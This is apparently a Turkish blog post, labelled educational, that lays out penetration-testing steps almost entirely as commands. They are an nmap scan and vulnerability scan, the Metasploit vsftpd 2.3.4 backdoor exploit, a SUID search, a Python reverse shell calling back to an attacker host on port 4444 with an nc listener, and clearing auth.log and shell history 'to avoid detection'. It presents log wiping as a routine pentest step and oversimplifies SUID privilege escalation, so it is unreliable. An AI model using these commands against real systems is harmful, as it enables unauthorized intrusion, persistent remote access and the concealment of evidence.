Penetrasyon Testi için Adımlar (Eğitim Amaçlı)

📌 1. Bilgi Toplama (Reconnaissance)

Bu aşamada hedef hakkında bilgi toplanır. Örneğin, Nmap kullanarak bir sistemin açık portlarını tarayalım.

🔹 Nmap ile Açık Port Tarama (Aktif Bilgi Toplama)

bashKopyalaDüzenlenmap -sS -Pn -T4 -p- 192.168.1.1

Bu komut:
SYN taraması yapar
Tüm portları tarar
Açık portları ve servisleri listeler


📌 2. Zafiyet Analizi

Açık portlardan birinde çalışan servislerde zafiyet olup olmadığını kontrol edelim.

🔹 Nmap ile Servis Tespiti ve Zafiyet Tarama

bashKopyalaDüzenlenmap -sV --script=vuln 192.168.1.1

Bu komut, hedef sistemde çalışan servisleri tespit eder ve varsa CVE açıklarını listeler.


📌 3. Exploitation (İstismar)

Hedefte bulunan bir FTP servisini (vsftpd 2.3.4) exploit etmek için Metasploit Framework kullanabiliriz.

🔹 Metasploit ile Exploit Çalıştırma

bashKopyalaDüzenlemsfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.1
exploit

Bu komut ile arka kapı (backdoor) açılır ve sisteme uzaktan bağlanma imkanı elde edilir.


📌 4. Yetki Yükseltme (Privilege Escalation)

Sisteme bağlandıktan sonra yetki yükseltme işlemi yapabiliriz.

🔹 Linux’ta SUID Biten Dosyaları Bulma (Yetki Yükseltme Öncesi)

bashKopyalaDüzenlefind / -perm -4000 2>/dev/null

Bu komut, SUID biti aktif olan dosyaları listeler. Örneğin, /bin/bash dosyası varsa, root yetkisine sahip olabiliriz.


📌 5. Kalıcı Erişim Sağlama

Yetki yükselttikten sonra kalıcı erişim sağlamak için bir reverse shell açabiliriz.

🔹 Python ile Reverse Shell Bağlantısı

Hedef sisteme şu komutu çalıştırarak saldırganın sistemine bağlantı açabiliriz:

bashKopyalaDüzenlepython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bunun için saldırgan tarafında nc dinleyici açmalıyız:

bashKopyalaDüzenlenc -lvp 4444

Bağlantı sağlandığında hacker, hedef makinede shell elde eder.


📌 6. Logları Silme ve Raporlama

Tespit edilmemek için sistem loglarını temizleme işlemi yapılabilir.

🔹 Linux Log Temizleme

bashKopyalaDüzenleecho "" > /var/log/auth.log
history -c

Bu komut, yetkisiz erişim izlerini kaldırır.


📌 Akış Diyagramı

Pentest sürecinin temel akışını aşağıdaki gibi görselleştirebiliriz:

plaintextKopyalaDüzenle        Başlangıç
            |
            ▼
   📡 Bilgi Toplama
   (Nmap, Recon-ng)
            |
            ▼
 🔍 Zafiyet Tespiti
   (Exploit-DB, CVE)
            |
            ▼
 💣 Exploitation
   (Metasploit, RCE)
            |
            ▼
 🚀 Yetki Yükseltme
   (Privilege Escalation)
            |
            ▼
 🔒 Kalıcı Erişim
   (Reverse Shell)
            |
            ▼
 📊 Raporlama ve Log Temizleme
            |
            ▼
        Bitiş ✅
  • Gönderiler/Makaleler/Tezler

    Yapay Zeka Destekli Konteyner Kontrolü:

    UNODC CCP Modelinin Geliştirilmesinde Makine Öğrenmesi Yaklaşımlarının Rolü ÖzetKüresel ticaretin %90’ından fazlası denizyolu ile gerçekleştirilmektedir. Bu büyük hacimli tücaret trafiği, suç örgütleri tarafından yasa dışı malların (uyuşturucu, silah, sahte ürünler,…

    UNODC Container Control Programme (CCP): Küresel Ticaretin Güvenliği İçin Stratejik Bir Model

    Özet Uluslararası ticaretin önemli bir bölümünün konteyner taşımacılığıyla yürütülmesi, limanlar ve sınır kapılarını yasa dışı ticaret faaliyetleri açısından kritik noktalar haline getirmiştir. Bu bağlamda, Birleşmiş Milletler Uyuşturucu ve Suç Ofisi…

    Bir yanıt yazın

    E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

    Neler Kaçırdın?

    Yapay Zeka Destekli Konteyner Kontrolü:

    • By admin
    • Nisan 17, 2025
    • 11 views
    Yapay Zeka Destekli Konteyner Kontrolü:

    UNODC Container Control Programme (CCP): Küresel Ticaretin Güvenliği İçin Stratejik Bir Model

    • By admin
    • Nisan 17, 2025
    • 12 views
    UNODC Container Control Programme (CCP): Küresel Ticaretin Güvenliği İçin Stratejik Bir Model

    Uyuşturucu ve Silah Kaçakçılığı: Uluslararası Güvenlik Açısından Küresel Bir Tehdit

    • By admin
    • Nisan 17, 2025
    • 17 views
    Uyuşturucu ve Silah Kaçakçılığı: Uluslararası Güvenlik Açısından Küresel Bir Tehdit

    Trump: Amerika’nın Çöküşünü mü Tetikleyecek, Yoksa Onu Tekrar İstikrarlı Bir Güce mi Dönüştürecek?

    • By admin
    • Nisan 17, 2025
    • 23 views
    Trump: Amerika’nın Çöküşünü mü Tetikleyecek, Yoksa Onu Tekrar İstikrarlı Bir Güce mi Dönüştürecek?

    ÇİN / TAYVAN SORUNU

    • By admin
    • Nisan 17, 2025
    • 29 views
    ÇİN / TAYVAN SORUNU

    AMD Instinct MI300X: Yapay Zekâ ve HPC için Yeni Nesil Hızlandırıcı

    • By admin
    • Nisan 9, 2025
    • 71 views
    AMD Instinct MI300X: Yapay Zekâ ve HPC için Yeni Nesil Hızlandırıcı